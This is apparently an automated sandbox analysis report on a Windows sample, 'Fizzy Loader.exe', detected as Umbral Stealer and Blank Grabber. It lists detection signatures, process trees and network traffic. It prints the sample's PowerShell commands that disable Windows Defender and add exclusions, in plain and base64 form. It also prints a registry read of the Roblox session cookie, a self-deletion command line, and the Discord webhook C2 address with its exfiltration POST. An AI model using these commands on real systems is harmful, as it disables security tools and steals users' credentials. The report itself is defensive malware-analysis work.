Windows Analysis Report
Fizzy Loader.exe

Overview

General Information

Sample name: Fizzy Loader.exe
Analysis ID: 1582592
MD5: b56af795f8b7edc6f35a9e905921ed0e
SHA1: c82cb0088bc9c93fd9a491ad278f410d44265a4d
SHA256: 46a67cdc899f61ccb6324d187d56b389f720d72beb02594fd60fdc4a8ca62ab4
Tags: exe, UmbralStealer, user-aachum

Detection

Blank Grabber, Umbral Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Blank Grabber
Yara detected Umbral Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies the hosts file
Self deletion via cmd or bat file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses attrib.exe to hide files
Uses ping.exe to check the status of other devices and networks
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Fizzy Loader.exe (PID: 1708 cmdline: "C:\Users\user\Desktop\Fizzy Loader.exe" MD5: B56AF795F8B7EDC6F35A9E905921ED0E)
    • WMIC.exe (PID: 1996 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 1440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 5080 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\Fizzy Loader.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • conhost.exe (PID: 6656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5688 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 4568 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 6156 cmdline: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1892 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 428 cmdline: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 6552 cmdline: "wmic.exe" os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 4308 cmdline: "wmic.exe" computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 7156 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1308 cmdline: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 432 cmdline: "wmic" path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3560 cmdline: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\Fizzy Loader.exe" && pause MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 5656 cmdline: ping localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
  • cleanup
{"C2 url": "https://discord.com/api/webhooks/1323224754576166912/ngAQr5IRg8PVqlg_GePwPe46g-WcVmFR7-gQu1RH44lVF1JX9hv6jSy8rNgxBAU6LxYx", "Version": "v1.3"}
Source | Rule | Description | Author | Strings
Fizzy Loader.exe | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
Fizzy Loader.exe | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security |
Fizzy Loader.exe | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attemping to enumerate video devices using WMI | ditekSHen |
  • 0x31870:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0x319f6:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0x31a92:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

Source | Rule | Description | Author | Strings
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attemping to enumerate video devices using WMI | ditekSHen |
  • 0x31870:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0x319f6:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0x31a92:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

Source | Rule | Description | Author | Strings
00000000.00000000.1996507067.00000172AED82000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000000.00000000.1996507067.00000172AED82000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security |
00000000.00000002.2624137126.00000172B0CE9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000000.00000002.2624137126.00000172B0BBD000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000000.00000002.2624137126.00000172B0BBD000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.0.Fizzy Loader.exe.172aed80000.0.unpack | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
0.0.Fizzy Loader.exe.172aed80000.0.unpack | JoeSecurity_UmbralStealer | Yara detected Umbral Stealer | Joe Security |
0.0.Fizzy Loader.exe.172aed80000.0.unpack | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice | Detects executables attemping to enumerate video devices using WMI | ditekSHen |
  • 0x31870:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
  • 0x319f6:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
  • 0x31a92:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Fizzy Loader.exe", ParentImage: C:\Users\user\Desktop\Fizzy Loader.exe, ParentProcessId: 1708, ParentProcessName: Fizzy Loader.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe', ProcessId: 5688, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Fizzy Loader.exe", ParentImage: C:\Users\user\Desktop\Fizzy Loader.exe, ParentProcessId: 1708, ParentProcessName: Fizzy Loader.exe, ProcessCommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, ProcessId: 6156, ProcessName: powershell.exe
Source: Threat created, Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 4308, StartAddress: C76632B0, TargetImage: C:\Windows\System32\conhost.exe, TargetProcessId: 4308
Source: File created, Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Fizzy Loader.exe, ProcessId: 1708, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ukUGV.scr
Source: File created, Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\Fizzy Loader.exe, ProcessId: 1708, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ukUGV.scr
Source: File created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\Fizzy Loader.exe, ProcessId: 1708, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ukUGV.scr
Source: File created, Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\Fizzy Loader.exe, ProcessId: 1708, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ukUGV.scr
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Fizzy Loader.exe", ParentImage: C:\Users\user\Desktop\Fizzy Loader.exe, ParentProcessId: 1708, ParentProcessName: Fizzy Loader.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe', ProcessId: 5688, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-31T00:50:52.056252+0100 | 2045593 | 1 | A Network Trojan was detected | 192.168.2.5 | 49939 | 162.159.138.232 | 443 | TCP
2024-12-31T00:50:28.592541+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49807 | 208.95.112.1 | 80 | TCP

AV Detection

Source: Fizzy Loader.exe, Avira: detected
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr, Avira: detection malicious, Label: HEUR/AGEN.1307507
Source: Fizzy Loader.exe, Malware Configuration Extractor: Umbral Stealer {"C2 url": "https://discord.com/api/webhooks/1323224754576166912/ngAQr5IRg8PVqlg_GePwPe46g-WcVmFR7-gQu1RH44lVF1JX9hv6jSy8rNgxBAU6LxYx", "Version": "v1.3"}
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr, ReversingLabs: Detection: 73%
Source: Fizzy Loader.exe, ReversingLabs: Detection: 73%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr, Joe Sandbox ML: detected
Source: Fizzy Loader.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\Fizzy Loader.exe, Code function: 0_2_00007FF8491036AE CryptUnprotectData,0_2_00007FF8491036AE
Source: Fizzy Loader.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.5:49939 version: TLS 1.2
Source: Fizzy Loader.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Network traffic, Suricata IDS: 2045593 - Severity 1 - ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) : 192.168.2.5:49939 -> 162.159.138.232:443
Source: Malware configuration extractor, URLs: https://discord.com/api/webhooks/1323224754576166912/ngAQr5IRg8PVqlg_GePwPe46g-WcVmFR7-gQu1RH44lVF1JX9hv6jSy8rNgxBAU6LxYx
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\PING.EXE ping localhost
Source: global traffic, HTTP traffic detected:
  GET /line/?fields=hosting HTTP/1.1
  Host: ip-api.com
  Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
  GET /json/?fields=225545 HTTP/1.1
  Host: ip-api.com
Source: Joe Sandbox View, IP Address: 208.95.112.1
Source: Joe Sandbox View, IP Address: 162.159.138.232
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown, DNS query: name: ip-api.com
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49807 -> 208.95.112.1:80
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: ip-api.com
Source: global traffic, DNS traffic detected: DNS query: discord.com
Source: unknown, HTTP traffic detected:
  POST /api/webhooks/1323224754576166912/ngAQr5IRg8PVqlg_GePwPe46g-WcVmFR7-gQu1RH44lVF1JX9hv6jSy8rNgxBAU6LxYx HTTP/1.1
  Accept: application/json
  User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
  Content-Type: application/json; charset=utf-8
  Host: discord.com
  Content-Length: 940
  Expect: 100-continue
  Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Mon, 30 Dec 2024 23:50:51 GMT
  Content-Type: application/json
  Content-Length: 45
  Connection: close
  Cache-Control: public, max-age=3600, s-maxage=3600
  strict-transport-security: max-age=31536000; includeSubDomains; preload
  x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
  x-ratelimit-limit: 5
  x-ratelimit-remaining: 4
  x-ratelimit-reset: 1735602653
  x-ratelimit-reset-after: 1
  via: 1.1 google
  alt-svc: h3=":443"; ma=86400
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sp9Xcu7jb8Q9TDFkNuyBO0qkdajgnAtBb3bX4ito3vUfs%2FksigpR1ayZMAFn8g9EekmaUitIT%2BBNEubbCHXb7TkaClq5s7zogJ%2BkBhMrsAPJMeIbueqSqYNVIa8N"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  X-Content-Type-Options: nosniff
  Set-Cookie: __cfruid=00cd115a1a74109f9fe413390f3319ad8bb28a98-1735602651; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
  Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
  Set-Cookie: _cfuvid=s_12375XKPSx0UJ_BaiP2SV1hCsiVbbEJ1oivB0yLQs-1735602651904-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
  Server: cloudflare
  CF-RAY: 8fa5ef3d8bec5e74-EWR

  {"message": "Unknown Webhook", "code": 10015}
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Mon, 30 Dec 2024 23:50:53 GMT
  Content-Type: application/json
  Content-Length: 45
  Connection: close
  Cache-Control: public, max-age=3600, s-maxage=3600
  strict-transport-security: max-age=31536000; includeSubDomains; preload
  x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
  x-ratelimit-limit: 5
  x-ratelimit-remaining: 4
  x-ratelimit-reset: 1735602654
  x-ratelimit-reset-after: 1
  via: 1.1 google
  alt-svc: h3=":443"; ma=86400
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M3sFzqoe8yR%2FjHoxNFvxHpwyMrJIJ3N3abOydo%2FwysoygHPEGkIUD1tZAEr%2FMwcB9n0ozg4B6R7vHwken%2Ftia5kGsgqjLNPZ4iQ7Hx2bKqehRdraR9S34%2Fs30d8I"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  X-Content-Type-Options: nosniff
  Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
  Server: cloudflare
  CF-RAY: 8fa5ef433d397c84-EWR

  {"message": "Unknown Webhook", "code": 10015}
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
                        Source: ukUGV.scr.0.drString found in binary or memory: https://github.com/Blank-c/Umbral-Stealer
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0CE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Umbral-StealerhT
                        Source: powershell.exe, 00000016.00000002.2405447937.000001EABE6BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
                        Source: Fizzy Loader.exe, ukUGV.scr.0.drString found in binary or memory: https://gstatic.com/generate_204e==================Umbral
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
                        Source: powershell.exe, 00000006.00000002.2087596667.0000027715CA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2203387646.000001D070295000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2147361329.000001D061A9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2203387646.000001D070152000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2319277381.000002051007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2228868697.00000205019B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2319277381.00000205101B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2545198762.000001EACCECD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2405447937.000001EABE718000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2545198762.000001EACD004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: powershell.exe, 0000000B.00000002.2147361329.000001D061707000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2228868697.0000020501793000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2405447937.000001EABE2F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                        Source: powershell.exe, 0000000B.00000002.2147361329.000001D061707000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2228868697.0000020501793000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2405447937.000001EABE2F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
                        Source: Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                        Source: unknown Network traffic detected: HTTP traffic on port 49945 -> 443
                        Source: unknown Network traffic detected: HTTP traffic on port 49939 -> 443
                        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49939
                        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49945
                        Source: unknown HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.5:49939 version: TLS 1.2

                        Spam, unwanted Advertisements and Ransom Demands

                        Source: C:\Users\user\Desktop\Fizzy Loader.exe File written: C:\Windows\System32\drivers\etc\hosts

                        System Summary

                        Source: Fizzy Loader.exe, type: SAMPLE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: 0.0.Fizzy Loader.exe.172aed80000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr, type: DROPPED Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: Fizzy Loader.exe, 00000000.00000000.1996533714.00000172AEDBC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilename vs Fizzy Loader.exe
                        Source: Fizzy Loader.exe Binary or memory string: OriginalFilename vs Fizzy Loader.exe
                        Source: Fizzy Loader.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: Fizzy Loader.exe, type: SAMPLE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: 0.0.Fizzy Loader.exe.172aed80000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: Fizzy Loader.exe, -----.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
